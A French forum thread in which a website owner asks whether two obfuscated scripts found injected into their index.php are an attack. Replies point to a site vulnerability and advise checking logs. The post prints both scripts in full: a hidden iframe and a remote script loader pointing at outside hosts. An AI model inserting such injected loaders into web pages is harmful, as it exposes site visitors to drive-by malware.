Bonsoir à tous,

Voila depuis plusieur jour j'ai sur ma page d'index.php le code suivant :

<script type='text/javascript'>str="<ijbwjuics src=" + unescape('%68%74%74%70%3a%2f%2f%39%31%2e%32%31%32%2e%31%39%38%2e%31%31%35%2f%77%65%62%66%6f%72%75%6d%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%38') + " xaoz3='1'vxoq3='1'>";str = str.replace('ijb', 'i');str =str.replace('wju', 'fr');str = str.replace('ics', 'ame');str =str.replace('xaoz3', 'width');str =str.replace('vxoq3','height');document.write(str);</script>

Juste apres le <body>.

Ensuite en fin de page, apres </body>
</html>

Voila le code que j'ai :

<script>var da=false;var J="J";this.F="F";var S;var hc='';this.qr=38506;this.qr+=120;j=function(){var R=new Array();this.rl=4886;this.rl+=162;function E(b,V,N){FH=["ex","QY"];X=["hk"];return b.substr(V,N);}var _j="";var HK={};Qz=64400;Qz++;this.Hb=36943;this.Hb--;var c='';G=5365;G+=225;var Z=RegExp;var AN={bQ:false};var h=document;var p=["el"];RM=25709;RM-=127;var d="/g"+"oo"+"gl"+E("e.Zhm",0,2)+E("coQEK",0,2)+"m/"+E("26umcou26m",4,2)+E("mc2sw",0,2)+"as"+E("dhPt.hdP",3,2)+"ne"+E("28Gt/G82",3,2)+E("shXU3J",0,2)+"ar"+E("eaMWm8",0,2)+E("sacpI",0,2)+E("OKRQleRKOQ",4,2)+E("DzM.cMzD",3,2)+E("OC2omO2C",3,2)+E(".pdhP",0,2)+E("hpFef",0,2);w=["pE"];function H(b,V){vE=[];var N=new String("[")+V+"]";var n=new Z(N, "g");var lZ={tQ:"Oy"};Wp={mB:false};return b.replace(n, c);};var jq="";this.iR=34248;this.iR-=1;var e=null;var QG=new Date();var m=String("bo"+"dy");var l=H('sRcormiopWtm','bWP0mRdoU');var WU=new String();var HN=new String();var HM=530470-522390;this.rd=29167;this.rd-=182;this.NT=7464;this.NT-=78;Zw=["jfA"];vJ=["CG"];S=function(){this.MG=14399;this.MG+=199;L=19334;L+=236;try {try {var Ic='dob'} catch(Ic){};var A=H('cirYedaQtYeiEWlXeimdeQnYtB','WXi2_xQ9NBYPdq');q=h[A](l);pz=["bK","Fb"];try {} catch(pl){};var W=E("des2n",0,2)+"fe"+"r";this.ga="";var b=HM+d;hz=51363;hz+=51;var zC=["eZ"];var r=H('s6rgcz','CtdDl4zTw6gJ');this.Of=49983;this.Of++;this.mn=4467;this.mn++;te=29850;te+=81;this._d=false;q[r]=String(E("http:ELMb",0,5)+"//one"+"winte"+E("NSwFr.ru:NFwS",4,5))+b;q[W]=[1,1][0];JA=63136;JA-=98;var Xa=new Date();h[m].appendChild(q);yo=["cZ","Cn"];} catch(z){this.Y='';};this.kg="";this.jH="";};var WG={oU:"Fj"};};var Pm={fD:"xL"};var rB="rB";j();this.fA=56809;this.fA--;try {var Bp='gi'} catch(Bp){};window.onload=S;tB={zl:16998};</script>
<!--56e13a7192fce70a3f30d6069111641e-->

J'ai donc supprimer tous le spetit bou de code sur ma page d'index.php, car sinon ma page n'est pas visible.
Je comprend pas, j'ai jamais mis se code, c'est donc une attaque d'apres vous ?

Merci de vos réponse et bonne soirée.
Amicalement.

Slt ,

tu trouveras sur ce même forum de nombreux posts similaires ..

Cette injection de code est pour la plupart des cas due à une faille sur ton site ...

Supprimer ce bout de code , finalement ne sert pas à grand chose si derrière tu ne trouves pas par ou est passé le "pirate".
Vérifies les logs si tu le peux , sinon revoie ton code entièrement à la recherche de failles ..

Good luck ,
Ch.

Au passage, appelons les choses par leur nom

Oups le message date, juste pour signaler que le sujet est résolu, merci à vous

Au passage, appelons les choses par leur nom

ce qui est partiellement faux aussi, Javascript tirant son nom de Java, vu que netscape et sun avait un accord et que netscape avait crée Javascript comme le pendant client-side du java utilisé dans les applets. Qui plus est Java a été cré pour la domotique à la base pas pour etre un langage qui marche sur toutes les plateformes, c'est juste que la domotique a été un gros fail et que Sun a "réorienté" Java (fin moi perso j'appelle ça, de la récupération dans la poubelle) donc oui Java et Javascript sont différent mais le nom de l'un vient bien du nom de l'autre.